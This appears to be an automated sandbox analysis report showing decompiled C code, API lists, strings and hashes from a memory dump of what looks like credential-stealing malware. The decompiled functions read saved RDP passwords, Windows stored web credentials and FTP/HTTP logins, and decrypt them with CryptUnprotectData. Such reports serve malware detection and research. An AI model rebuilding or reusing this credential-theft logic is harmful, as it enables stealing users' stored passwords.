                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 3040542784-1692270452
                                                                        • Opcode ID: cc625c614b2b064663642a7af0a9cc30a593a0ba8ab8d44e069f99ff811a3761
                                                                        • Instruction ID: 3c8cc9b50cd0f0f031436ee2fa180d1129fc000271da3e07714d4956bd7e6d77
                                                                        • Opcode Fuzzy Hash: cc625c614b2b064663642a7af0a9cc30a593a0ba8ab8d44e069f99ff811a3761
                                                                        • Instruction Fuzzy Hash: 53314072500209AADF21BF62CD02BEE7775AF44314F5480BBB548B60B1DB7C9E909F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				signed char _v24;
                                                                        				CHAR* _v28;
                                                                        				signed char _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				signed char _t40;
                                                                        				signed char _t43;
                                                                        				signed char _t51;
                                                                        				signed char _t53;
                                                                        				signed char _t55;
                                                                        				signed char _t59;
                                                                        				signed char _t64;
                                                                        				signed char _t65;
                                                                        				char _t66;
                                                                        
                                                                        				if( *0x41442d != 0) {
                                                                        					_t40 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						__eflags = _v8 - 0x100000;
                                                                        						if(_v8 >= 0x100000) {
                                                                        							L23:
                                                                        							return E00401FB0( &_v20);
                                                                        						}
                                                                        						_t43 = E004022C7(_v12, _v8);
                                                                        						__eflags = _t43;
                                                                        						if(_t43 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_v24 = E0040CDD0("username:s:", _v12, _v8);
                                                                        						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
                                                                        						_v32 = E0040CDD0("full address:s:", _v12, _v8);
                                                                        						__eflags = _v24;
                                                                        						if(_v24 == 0) {
                                                                        							L22:
                                                                        							E004017D5(_v24);
                                                                        							E004017D5(_v28);
                                                                        							E004017D5(_v32);
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _v28;
                                                                        						if(_v28 == 0) {
                                                                        							goto L22;
                                                                        						}
                                                                        						__eflags = _v32;
                                                                        						if(_v32 != 0) {
                                                                        							_t51 = lstrlenA(_v28);
                                                                        							_t64 = _t51 >> 1;
                                                                        							_push(_t64);
                                                                        							while(1) {
                                                                        								_t65 = _t64;
                                                                        								__eflags = _t65;
                                                                        								if(_t65 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								asm("lodsw");
                                                                        								__eflags = _t51 - 0x30;
                                                                        								if(_t51 < 0x30) {
                                                                        									L12:
                                                                        									_t53 = _t51 - 0x41 + 0xa;
                                                                        									__eflags = _t53;
                                                                        									L13:
                                                                        									__eflags = _t53 - 0x30;
                                                                        									if(_t53 < 0x30) {
                                                                        										L16:
                                                                        										_t55 = _t53 - 0x41 + 0xa;
                                                                        										__eflags = _t55;
                                                                        										L17:
                                                                        										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
                                                                        										asm("stosb");
                                                                        										_t64 = _t65 - 1;
                                                                        										__eflags = _t64;
                                                                        										continue;
                                                                        									}
                                                                        									__eflags = _t53 - 0x39;
                                                                        									if(_t53 > 0x39) {
                                                                        										goto L16;
                                                                        									}
                                                                        									_t55 = _t53 - 0x30;
                                                                        									goto L17;
                                                                        								}
                                                                        								__eflags = _t51 - 0x39;
                                                                        								if(_t51 > 0x39) {
                                                                        									goto L12;
                                                                        								}
                                                                        								_t53 = _t51 - 0x30;
                                                                        								goto L13;
                                                                        							}
                                                                        							_pop(_t66);
                                                                        							_v40 = _t66;
                                                                        							_push(_v28);
                                                                        							_pop( *_t22);
                                                                        							_v44 = 0;
                                                                        							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                        							__eflags = _t59;
                                                                        							if(_t59 != 0) {
                                                                        								__eflags = _v44;
                                                                        								if(__eflags != 0) {
                                                                        									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                        									LocalFree(_v44);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					return _t40;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CF47
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CFAD
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040CFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                        • API String ID: 2920030623-2945746679
                                                                        • Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
                                                                        • Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A62F
                                                                        • lstrlenW.KERNEL32(00415B17,?,?,00000000), ref: 0040A66D
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A69D
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040A6CF
                                                                        • CredFree.ADVAPI32(00000000), ref: 0040A6ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                                        • String ID: Microsoft_WinInet_*
                                                                        • API String ID: 3891647360-439986189
                                                                        • Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
                                                                        • Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00402D57(void* __ebx) {
                                                                        				int _t25;
                                                                        				void* _t33;
                                                                        				void* _t36;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        
                                                                        				_t49 = __ebx;
                                                                        				while(1) {
                                                                        					L15:
                                                                        					while(1) {
                                                                        						L17:
                                                                        						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        						L1:
                                                                        						if(_t25 != 0) {
                                                                        							L2:
                                                                        							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
                                                                        								L17:
                                                                        								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        								goto L1;
                                                                        							} else {
                                                                        								L3:
                                                                        								 *(_t52 - 0x13c) = 0;
                                                                        								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
                                                                        								_t51 =  *(_t52 - 0x13c);
                                                                        								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
                                                                        									continue;
                                                                        								} else {
                                                                        									L5:
                                                                        									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
                                                                        									if(_t36 == 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L6:
                                                                        										 *(_t52 - 8) = _t36;
                                                                        										_push(_t52 - 4);
                                                                        										_push(0x201eb);
                                                                        										_push( *(_t52 - 8));
                                                                        										if( *0x41440d() == 0) {
                                                                        											CloseHandle( *(_t52 - 8));
                                                                        											continue;
                                                                        											do {
                                                                        												do {
                                                                        													do {
                                                                        														goto L17;
                                                                        													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
                                                                        													goto L3;
                                                                        												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
                                                                        												goto L5;
                                                                        											} while (_t36 == 0);
                                                                        											goto L6;
                                                                        										} else {
                                                                        											_push( *(_t52 - 4));
                                                                        											if( *0x414411() == 0) {
                                                                        												CloseHandle( *(_t52 - 4));
                                                                        												CloseHandle( *(_t52 - 8));
                                                                        												goto L15;
                                                                        											} else {
                                                                        												_t49 = _t49 + 1;
                                                                        												 *(_t52 - 0x140) = 0;
                                                                        												_t45 = _t52 - 0x140;
                                                                        												_push(_t45);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
                                                                        													 *0x4140fe =  *(_t52 - 0x140);
                                                                        												}
                                                                        												if( *((intOrPtr*)(_t52 + 8)) != 0) {
                                                                        													 *__eax =  *(_t52 - 4);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						CloseHandle( *(_t52 - 0x138));
                                                                        						return _t49;
                                                                        					}
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
                                                                        • CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
                                                                        • CloseHandle.KERNEL32(00410B93), ref: 00402D6E
                                                                        • Process32Next.KERNEL32 ref: 00402D80
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$Open$CurrentNextProcessProcess32User
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 2771112661-3187896405
                                                                        • Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
                                                                        • Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E0040A774(CHAR* _a4, unsigned int* _a8) {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				unsigned int _t22;
                                                                        				unsigned int _t23;
                                                                        				intOrPtr _t25;
                                                                        				void* _t28;
                                                                        				unsigned int _t45;
                                                                        				unsigned int _t46;
                                                                        				intOrPtr* _t56;
                                                                        
                                                                        				 *_a8 = 0;
                                                                        				_t22 = lstrlenA(_a4);
                                                                        				if(_t22 > 1) {
                                                                        					_t23 = _t22 >> 1;
                                                                        					 *_a8 = _t23;
                                                                        					_t45 = _t23;
                                                                        					if(_t23 < 0) {
                                                                        						L25:
                                                                        						return 0;
                                                                        					} else {
                                                                        						_t56 = _a4;
                                                                        						while(1) {
                                                                        							_t46 = _t45;
                                                                        							if(_t46 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t25 =  *_t56;
                                                                        							if(_t25 < 0x30 || _t25 > 0x39) {
                                                                        								if(_t25 < 0x41 || _t25 > 0x46) {
                                                                        									return 0;
                                                                        								} else {
                                                                        									_t28 = _t25 - 0x41 + 0xa;
                                                                        									goto L11;
                                                                        								}
                                                                        							} else {
                                                                        								_t28 = _t25 - 0x30;
                                                                        								L11:
                                                                        								if(_t28 < 0x30 || _t28 > 0x39) {
                                                                        									if(_t28 < 0x41 || _t28 > 0x46) {
                                                                        										return 0;
                                                                        									} else {
                                                                        										goto L18;
                                                                        									}
                                                                        								} else {
                                                                        									L18:
                                                                        									asm("stosb");
                                                                        									_t45 = _t46 - 1;
                                                                        									_t56 = _t56 + 2;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        							goto L26;
                                                                        						}
                                                                        						 *_t7 =  *_a8;
                                                                        						_push(_a4);
                                                                        						_pop( *_t9);
                                                                        						_v16 = 0;
                                                                        						if( *0x41442d == 0) {
                                                                        							goto L25;
                                                                        						} else {
                                                                        							_push( &_v20);
                                                                        							_push(1);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push( &_v12);
                                                                        							if( *0x41442d() == 0 || _v16 == 0 || _v20 >  *_a8) {
                                                                        								goto L25;
                                                                        							} else {
                                                                        								asm("cld");
                                                                        								asm("jecxz 0x4");
                                                                        								memcpy(_a4, _v16, _v20);
                                                                        								_push(_v20);
                                                                        								_pop( *__eax);
                                                                        								LocalFree(_v16);
                                                                        								return 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        				L26:
                                                                        			}















                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 0040A789
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A841
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040A874
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2920030623-0
                                                                        • Opcode ID: a775da1fc8795b0329dcd1934e36d95e40dd037ff2698ef19ff8e94b293602b7
                                                                        • Instruction ID: ebfb9bc9a5af13da0ede983ec79a32a421a33feacbe52591692a80cc60e581d1
                                                                        • Opcode Fuzzy Hash: a775da1fc8795b0329dcd1934e36d95e40dd037ff2698ef19ff8e94b293602b7
                                                                        • Instruction Fuzzy Hash: E231B377600208DEEF24AE94DC44BCEB775EB853A4F508033E955A72C0D278DA93CA5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			E004042B2() {
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v12;
                                                                        				void* _v16;
                                                                        				long _v20;
                                                                        				char* _t16;
                                                                        				int _t20;
                                                                        
                                                                        				if( *0x4143e5 != 0 &&  *0x4143e9 != 0 &&  *0x4143ed != 0) {
                                                                        					_t16 =  &_v12;
                                                                        					 *_t16 = 0;
                                                                        					 *((char*)(_t16 + 1)) = 0;
                                                                        					 *((char*)(_t16 + 2)) = 0;
                                                                        					 *((char*)(_t16 + 3)) = 0;
                                                                        					 *((char*)(_t16 + 4)) = 0;
                                                                        					 *((char*)(_t16 + 5)) = 5;
                                                                        					_t20 = AllocateAndInitializeSid( &_v12, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16);
                                                                        					if(_t20 != 0) {
                                                                        						_v20 = 0;
                                                                        						_push( &_v20);
                                                                        						_push(_v16);
                                                                        						_push(0);
                                                                        						if( *0x4143e9() == 0) {
                                                                        							_v20 = 0;
                                                                        						}
                                                                        						FreeSid(_v16);
                                                                        						return _v20;
                                                                        					} else {
                                                                        						return _t20;
                                                                        					}
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404311
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040432D
                                                                        • FreeSid.ADVAPI32(?), ref: 00404341
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: c272008ddd9ff5ac31b0e59ec8a99d6d4388e5b05a8c2f2bac3df54c9546e374
                                                                        • Instruction ID: 8403d7bfacc3a932608c84047e01debe2ff2a77a2399b27da1d9f344307b3654
                                                                        • Opcode Fuzzy Hash: c272008ddd9ff5ac31b0e59ec8a99d6d4388e5b05a8c2f2bac3df54c9546e374
                                                                        • Instruction Fuzzy Hash: 85114475B002499EEB11CB94DC5EFDA7BF4AB91309F0880A5E520FA2E1D3B99604C75A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404208
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040423C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CryptDataFreeLocalUnprotect
                                                                        • String ID:
                                                                        • API String ID: 1561624719-0
                                                                        • Opcode ID: 71fb7d2c2897408b780e22b4e38b65f965134116e3be6dcbb1d92fa07ec4249a
                                                                        • Instruction ID: 8d530adce9134dd5c6d0473b1a366715ce8393482fa009439faddca2964bc4a5
                                                                        • Opcode Fuzzy Hash: 71fb7d2c2897408b780e22b4e38b65f965134116e3be6dcbb1d92fa07ec4249a
                                                                        • Instruction Fuzzy Hash: 37112B75600208EBDF118F84DC49BEE7B75FB84355F1480AAFA25772D0C3789A90CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 56%
                                                                        			E00403879(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v5;
                                                                        				char* _t18;
                                                                        				void* _t23;
                                                                        
                                                                        				_t23 = 0;
                                                                        				if(E00403819(_a4, 0x5a) != 0) {
                                                                        					while(E00403819(_a4, 0x5a) != 0) {
                                                                        						_push(0);
                                                                        						_push(1);
                                                                        						_t18 =  &_v5;
                                                                        						_push(_t18);
                                                                        						_push(_a4);
                                                                        						L00410E84();
                                                                        						if(_t18 > 0) {
                                                                        							if(_v5 == _a16) {
                                                                        								_t23 = 1;
                                                                        							}
                                                                        							_t25 =  *_a8;
                                                                        							_push(0);
                                                                        							_push(1);
                                                                        							_push( &_v5);
                                                                        							_push(_a8);
                                                                        							if(E0040106A( *((intOrPtr*)( *_a8 + 0x10))(), _t25, _a8) < _a12) {
                                                                        								if(_t23 == 0) {
                                                                        									continue;
                                                                        								}
                                                                        							} else {
                                                                        							}
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L9:
                                                                        				return _t23;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00403819: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 0040385E
                                                                        • recv.WSOCK32(0000003C,?,00000001,00000000,0000003C,0000005A,0000003C,0000005A,00000000), ref: 004038AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: recvselect
                                                                        • String ID:
                                                                        • API String ID: 741273618-0
                                                                        • Opcode ID: d5010ec86d2a16c2167cb1562ffb2a7e7d5e62fcdc5d42ef8b5a171485946c77
                                                                        • Instruction ID: a427b687c8d6af7e8018322dd1c8afccd8df2718942c7ca7000ea8b820f14b04
                                                                        • Opcode Fuzzy Hash: d5010ec86d2a16c2167cb1562ffb2a7e7d5e62fcdc5d42ef8b5a171485946c77
                                                                        • Instruction Fuzzy Hash: 3D01B532600209BBDF10BE51CC42B9A7FACAB10345F10C1B3F914BA1D1D7BADE419749
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040912E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				int* _v32;
                                                                        				int* _v36;
                                                                        				int* _v40;
                                                                        				int* _v44;
                                                                        				int* _v48;
                                                                        				CHAR* _v52;
                                                                        				CHAR* _v56;
                                                                        				CHAR* _v60;
                                                                        				CHAR* _v64;
                                                                        				char* _v68;
                                                                        				int _v72;
                                                                        				int _v76;
                                                                        				int _v80;
                                                                        				void* _t85;
                                                                        				int _t87;
                                                                        				int _t90;
                                                                        				int _t94;
                                                                        				int _t101;
                                                                        				int _t108;
                                                                        				int _t110;
                                                                        				int _t115;
                                                                        				int _t133;
                                                                        				int _t136;
                                                                        				int _t138;
                                                                        				void* _t140;
                                                                        				int _t141;
                                                                        				int* _t143;
                                                                        
                                                                        				_t85 = E00401E53(_a8);
                                                                        				if(_t85 != 0) {
                                                                        					_t87 = E00403F1F(_a8);
                                                                        					__eflags = _t87;
                                                                        					if(_t87 == 0) {
                                                                        						E00408EC5(_a12, _a16);
                                                                        						_t90 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        						__eflags = _t90;
                                                                        						if(_t90 != 0) {
                                                                        							_t94 = E00402515(_v12, _v8);
                                                                        							__eflags = _t94;
                                                                        							if(_t94 != 0) {
                                                                        								_v24 = _t94;
                                                                        								_t143 = _t94;
                                                                        								__eflags =  *_t143;
                                                                        								if(__eflags != 0) {
                                                                        									_v52 = E004090F2(__eflags, _t143);
                                                                        									_push(lstrcmpA("#2c", _v52));
                                                                        									_push(lstrcmpA("#2d", _v52));
                                                                        									_t101 = lstrcmpA("#2e", _v52);
                                                                        									_pop(_t141);
                                                                        									_pop(_t138);
                                                                        									__eflags = _t101;
                                                                        									if(_t101 == 0) {
                                                                        										L10:
                                                                        										__eflags = _t138;
                                                                        										if(_t138 != 0) {
                                                                        											_v80 = 0;
                                                                        										} else {
                                                                        											_v80 = 1;
                                                                        										}
                                                                        										asm("cld");
                                                                        										_t140 = 0xffffffff;
                                                                        										asm("repne scasb");
                                                                        										__eflags =  *_t143;
                                                                        										if ( *_t143 != 0) goto L14;
                                                                        										_v28 = 0;
                                                                        										while(1) {
                                                                        											__eflags =  *_t143;
                                                                        											if(__eflags == 0) {
                                                                        												goto L54;
                                                                        											}
                                                                        											_v56 = E004090F2(__eflags, _t143);
                                                                        											__eflags = _v28;
                                                                        											if(_v28 != 0) {
                                                                        												__eflags = _v28 - 1;
                                                                        												if(_v28 != 1) {
                                                                        													__eflags = _v28 - 2;
                                                                        													if(_v28 != 2) {
                                                                        														__eflags = _v28 - 3;
                                                                        														if(_v28 != 3) {
                                                                        															__eflags = _v28 - 4;
                                                                        															if(_v28 != 4) {
                                                                        																__eflags = _v28 - 5;
                                                                        																if(_v28 != 5) {
                                                                        																	__eflags = _v28 - 6;
                                                                        																	if(_v28 == 6) {
                                                                        																		_v28 = 2;
                                                                        																	}
                                                                        																} else {
                                                                        																	_v48 = _t143;
                                                                        																	__eflags = _v80;
                                                                        																	if(__eflags == 0) {
                                                                        																		_v28 = 6;
                                                                        																	} else {
                                                                        																		_v28 = 2;
                                                                        																	}
                                                                        																	_v68 = 0;
                                                                        																	_v60 = 0;
                                                                        																	_v64 = 0;
                                                                        																	_v72 = 0;
                                                                        																	_v76 = 0;
                                                                        																	_v68 = E004090F2(__eflags, _v32);
                                                                        																	_v60 = E004090F2(__eflags, _v40);
                                                                        																	_v64 = E004090F2(__eflags, _v48);
                                                                        																	__eflags =  *0x415824;
                                                                        																	if( *0x415824 != 0) {
                                                                        																		__eflags =  *0x415824 - 1;
                                                                        																		if( *0x415824 != 1) {
                                                                        																			_t115 = 0;
                                                                        																			__eflags = 0;
                                                                        																		} else {
                                                                        																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
                                                                        																		__eflags = _t133;
                                                                        																		if(_t133 != 0) {
                                                                        																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
                                                                        																		}
                                                                        																		_t115 = _t133;
                                                                        																		__eflags = _t115;
                                                                        																		if(_t115 != 0) {
                                                                        																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
                                                                        																		}
                                                                        																	}
                                                                        																	__eflags = _t115;
                                                                        																	if(_t115 == 0) {
                                                                        																		_v72 = E00408FA6(_t140, _v60, lstrlenA(_v60));
                                                                        																		_v76 = E00408FA6(_t140, _v64, lstrlenA(_v64));
                                                                        																		__eflags = _v68;
                                                                        																		if(_v68 != 0) {
                                                                        																			__eflags = _v76;
                                                                        																			if(_v76 != 0) {
                                                                        																				E00401486(_a4, 0xbeef0000);
                                                                        																				E004014E8(_a4, _v68);
                                                                        																				E004014E8(_a4, _v72);
                                                                        																				E004014E8(_a4, _v76);
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																	E004017D5(_v68);
                                                                        																	E004017D5(_v60);
                                                                        																	E004017D5(_v64);
                                                                        																	E004017D5(_v72);
                                                                        																	E004017D5(_v76);
                                                                        																}
                                                                        															} else {
                                                                        																_v44 = _t143;
                                                                        																_v28 = 5;
                                                                        															}
                                                                        														} else {
                                                                        															_v40 = _t143;
                                                                        															_v28 = 4;
                                                                        														}
                                                                        													} else {
                                                                        														_v36 = _t143;
                                                                        														_v28 = 3;
                                                                        													}
                                                                        												} else {
                                                                        													_v32 = _t143;
                                                                        													_v28 = 2;
                                                                        												}
                                                                        												__eflags = _v28;
                                                                        												if(_v28 != 0) {
                                                                        													_t108 = lstrcmpA(_v56, 0x414806);
                                                                        													__eflags = _t108;
                                                                        													if(_t108 == 0) {
                                                                        														_v28 = 1;
                                                                        													}
                                                                        													_t110 = lstrcmpA(_v56, "---");
                                                                        													__eflags = _t110;
                                                                        													if(_t110 == 0) {
                                                                        														_v28 = 2;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												_t136 = lstrcmpA(_v56, 0x414806);
                                                                        												__eflags = _t136;
                                                                        												if(_t136 == 0) {
                                                                        													_v28 = 1;
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v56);
                                                                        											asm("cld");
                                                                        											_t140 = 0xffffffff;
                                                                        											asm("repne scasb");
                                                                        											__eflags =  *_t143;
                                                                        											if( *_t143 != 0) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L54;
                                                                        										}
                                                                        									} else {
                                                                        										__eflags = _t141;
                                                                        										if(_t141 == 0) {
                                                                        											goto L10;
                                                                        										} else {
                                                                        											_t138 = _t138;
                                                                        											__eflags = _t138;
                                                                        											if(_t138 == 0) {
                                                                        												goto L10;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									L54:
                                                                        									E004017D5(_v52);
                                                                        								}
                                                                        								E004017D5(_v24);
                                                                        							}
                                                                        							E00401FB0( &_v20);
                                                                        						}
                                                                        						return E00408F7D();
                                                                        					} else {
                                                                        						return _t87;
                                                                        					}
                                                                        				} else {
                                                                        					return _t85;
                                                                        				}
                                                                        			}




































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
